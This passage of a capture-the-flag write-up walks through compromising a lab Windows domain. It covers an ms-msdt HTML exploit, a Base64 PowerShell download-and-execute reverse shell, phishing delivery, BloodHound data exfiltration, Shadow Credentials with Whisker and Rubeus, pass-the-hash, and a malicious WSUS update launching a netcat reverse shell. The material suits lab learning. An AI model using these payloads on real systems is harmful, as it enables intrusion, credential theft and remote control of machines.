//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
window.location.href = "ms-msdt:/id PCWDiagnostic /skip force /param \"IT_RebrowseForFile=cal?c IT_LaunchMethod=ContextMenu IT_SelectProgram=NotListed IT_BrowseForFile=h$(Start-Process('calc'))i/../../../../../../../../../../../../../../Windows/SYstem32/mpsigstub.exe IT_AutoTroubleshoot=ts_AUTO\"";
</script>

</body>
</html>

The only thing I need to modify is the last line in the javscript script tag, and specifically I need to replace Start-Process(‘calc’) with my malicious reverse shell code (Every thing else needs to stay the same otherwise the exploit will not work).

However, I also need to avoid using space character because it will break the payload, so one way to get this working is by using Invoke-Expression powershell command and Base64 encoding, making the payload such as the following:

Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'UTF8.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'SUVYIChOZXctT2JqZWN0IE5ldC5XZWJDbGllbnQpLkRvd25sb2FkU3RyaW5nKCJodHRwOi8vMTAuMTAuMTYuNy9JbnZva2UtUG93ZXJTaGVsbFRjcC5wczEiKQ=='+[char]34+'))')))

Where the decoded Base64 payload is:

Encoded: SUVYIChOZXctT2JqZWN0IE5ldC5XZWJDbGllbnQpLkRvd25sb2FkU3RyaW5nKCJodHRwOi8vMTAuMTAuMTYuNy9JbnZva2UtUG93ZXJTaGVsbFRjcC5wczEiKQ==
Decoded: IEX (New-Object Net.WebClient).DownloadString("http://10.10.16.7/Invoke-PowerShellTcp.ps1")

It uses IEX expression which will download a malicious powershell script hosted on my server and execute it directly without writing to disk.

This malicious script is Invoke-PowerShellTcp.ps1 from Nishang Project, however I appendeded this line at the end to trigger the reverse connection:

Invoke-PowerShellTcp -Reverse -IPAddress 10.10.16.7 -Port 1234

Final Exploit

Getting Reverse Shell

Trigger the exploit with:

sendemail -f most@xeon.com -t itsupport@outdated.htb -u "Click on link" -m "http://10.10.16.7/exploit.html" -s 10.10.11.175:25

Getting Reverse Shell

  • You can ignore the error in powershell, it will not affect the reverse shell.

Finding Possible Privilege Escalation

Dumping Domain Information Using BloodHound

Now, I will try to collect Active Directory information using SharpHound.ps1 and then analyse them using BloodHound:

IEX(New-Object Net.WebClient).DownloadString("http://10.10.16.3:8000/SharpHound.ps1")
Invoke-BloodHound -CollectionMethod All -Domain outdated.htb

BloodHound Dump

To transfer the file to my kali machine, I’ll use Invoke-RestMethod powershell command to send a post request containing the zip file to a python3 server under my control that will save it to disk:

Python3 server script:

#!/usr/bin/env python3
"""
Very simple HTTP server in python for logging to catch post request containing a file and write its content to disk
Usage::
    ./server.py [<port>]
"""
from http.server import BaseHTTPRequestHandler, HTTPServer
import logging

class S(BaseHTTPRequestHandler):
    def _set_response(self):
        self.send_response(200)
        self.send_header('Content-type', 'text/html')
        self.end_headers()

    def do_GET(self):
        self._set_response()
        self.wfile.write("No Get".encode('utf-8'))

    def do_POST(self):
        content_length = int(self.headers['Content-Length'])
        post_data = self.rfile.read(content_length)
        with open(str(self.path.split("/")[-1]), 'wb') as f:
            f.write(post_data)
        logging.info("Content written to %s", str(self.path))
        self._set_response()
        self.wfile.write("POST request for {}".format(self.path).encode('utf-8'))

def run(server_class=HTTPServer, handler_class=S, port=8080):
    logging.basicConfig(level=logging.INFO)
    server_address = ('', port)
    httpd = server_class(server_address, handler_class)
    logging.info('Starting httpd...\n')
    try:
        httpd.serve_forever()
    except KeyboardInterrupt:
        pass
    httpd.server_close()
    logging.info('Stopping httpd...\n')

if __name__ == '__main__':
    from sys import argv

    if len(argv) == 2:
        run(port=int(argv[1]))
    else:
        run()

Invoke-RestMethod -Uri "http://10.10.16.3:8080/20221214212009_BloodHound.zip" -Method Post -InFile "20221214212009_BloodHound.zip" -UseDefaultCredentials

Getting BloodHound Dump

Importing data in BloodHound:

Importing Zip File BloodHound

Since I got command execution as btables user, I’ll mark it as owned and try to find the Shortest Path From Owned Principals:

Finding Shortest Path From Owned Principals

Looks like btables user is a member of ITSTAFF group that has AddKeyCredentialLink on sflowers user. This means that btables has the ability to write to the msds-KeyCredentialLink property on SFLOWERS@OUTDATED.HTB, allowing him to create Shadow Credentials on the object (sflowers user) and authenticate as the principal using kerberos PKINIT.

  • msds-KeyCredentialLink (aka. “kcl”): attribute can be used to link an RSA key pair with a computer or user object in order to authenticate with said key pair against the KDC to receive a Kerberos TGT. So the kcl is in fact a set of alternate credentials that works alongside username/password.

Escalating To SFLOWERS Using Whisker

I’ll use Whisker which is a tool that will help me achieve this attack.

Compiling Whisker

Whisker does not come pre-compiled, which means that I need to have a windows machine to compile it, so I’ll use Windows Commando VM.

I can either use Visual Studio IDE or Dotnet command from the command line to compile the binary, but in either ways I need to install Visual Studio Installer in addition to its build tools.

After installing Visual Studio Installer, these are the required tools to download:

Visual Studio Installer Modify

Visual Studio Installer build tools

Now I can compile the binary using the following commands:

git clone https://github.com/eladshamir/Whisker.git
cd Whisker
"C:\Program Files (x86)\Microsoft Visual Studio\2017\BuildTools\MSBuild\15.0\Bin\MSBuild.exe" /t:Clean /t:Build /p:Configuration=Release /p:DebugSymbols=false /p:DebugType=None /p:TrimUnusedDependencies=true Whisker.sln

Compiling Whisker

Whisker Binary Path

  • If you’re using Visual Studio 2022 the steps should be the same execpt for the path of MSBuild.exe which will be different depending where the newer version stores it.

Executing Whisker

Uploading Whisker to the target machine:

Uploading Whisker To The Target

Executing Whisker:

.\Whisker.exe add /target:sflowers

Executing Whisker

This will give me a new command to run using Rubeus, so I need to upload this tool to the target machine as well:

Uploading Rubeus

However, since I am using Invoke-PowerShellTcp.ps1, the amount of characters I can use to run a command are limited, which means that simply copy pasting this long command will not work in my case. So what I’ll do is to copy it into a powershell file and then execute it from there:

$ cat whisker_command.ps1

.\Rubeus.exe asktgt /user:sflowers /certificate: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 /password:"ovojsJ9blcegavO1" /domain:outdated.htb /dc:DC.outdated.htb /getcredentials /show

Getting Long Rubeus Command Into a File

Running the script:

.\whisker_command.ps1

Getting NTLM Hash SFLOWERS

Gaining Access As SFLOWERS And Reading User Flag

Now that I have a Ticket Granting Ticket and the NTLM hash for the user sflowers, I can either use impacket-psexec (with the -k flag to use the TGT), or Evil-WinRM (with the hash) to access the machine and read the user flag.

In my case I’ll use Evil-WinRM:

evil-winrm -i outdated.htb --hash 1FCDB1F6015DCB318CC77BB2BDA14DB5 -u sflowers

Getting User

Now, I’ll use WinPEAS to look for possible vulnerabilities or misconfigurations allowing me to escalate to Administrator:

Searching For Possible Ways To Escalate To System

Uploading WinPEAS

Executing WinPEAS:

.\winPEASx64.exe

Finding WSUS Misconfiguration

Executing WinPEAS

It found that the server might be vulnerable to WSUS attack

  • WSUS: know as Windows Server Update Services, helps distribute updates, fixes, and other types of releases available from Microsoft Update using one or more WSUS servers which will centralize the job and give the administrators the control over which update to release to the clients, instead of having each machine go on the internet to download the update from there.

  • WSUS Attack: the attack takes advantage of the fact that the updates are requested using HTTP instead of HTTPS protocol, allowing the attackers to inject fake malicious updates into non-SSL WSUS traffic and gain control over the machine.

Checking the registry keys manually:

reg query HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate /v WUServer
reg query HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate\AU /v UseWUServer

Checking WSUS Vulnerability Manually

Exploiting WSUS Using SharpWSUS

I’ve tried to use many tools but for some reason only SharpWSUS and Wsuspendu worked for me.

Compiling SharpWSUS

First, I need to compile it from my Windows Commando VM and copy it to kali, so I’ll open a cmd and issue the following command:

git clone https://github.com/nettitude/SharpWSUS.git
cd SharpWSUS
"C:\Program Files (x86)\Microsoft Visual Studio\2017\BuildTools\MSBuild\15.0\Bin\MSBuild.exe" /t:Clean /t:Build /p:Configuration=Release /p:DebugSymbols=false /p:DebugType=None /p:TrimUnusedDependencies=true SharpWSUS.sln

Compiling SharpWSUS

SharpWSUS Binary Path

Creating Fake Update And Waiting For Reverse Shell

Transfering SharpWsus To Target

I also need to transfer PsExec.exe binary signed by microsoft. PsExec.exe is the binary that will allow me to run any command because WSUS doesn’t run any binary unless it’s signed to microsoft and the binaries inside PSTools are signed.

Transfering PsExec To Target

This is how the tool works:

  • First, I need to create the update and append my malicious command, in this case I’ll use Netcat (nc.exe) to get a reverse shell: 
    .\SharpWSUS.exe create /payload:"C:\Users\sflowers\Documents\PsExec.exe" /args:" -accepteula -s -d C:\\Users\\sflowers\\Documents\\nc.exe -e cmd.exe 10.10.16.24 8989" /title:"Xeon Update"
  • Next, I need to approve the update (I need to use /groupname flag or it will not work): 
    .\SharpWSUS.exe approve /updateid:137147af-1494-4067-94cf-9da1aeca5d41 /computername:dc.outdated.htb /groupname:"Xeons Group"
  • Finally, I can check for the update if it’s installed or not using: 
    .\SharpWSUS.exe check /updateid:137147af-1494-4067-94cf-9da1aeca5d41 /computername:dc.outdated.htb

Uploading nc.exe to target:

Uploading NetCat

Creating the update:

Creating The Update

Approving the update:

Approving The Update

Checking the update (not installed yet):

Checking The Update Not Installed

Waiting for a while before checking the update again (installed):

Checking The Update Installed

Getting System Shell And Reading Root Flag

Getting nt authority\system shell and reading root.txt flag:

Getting System Shell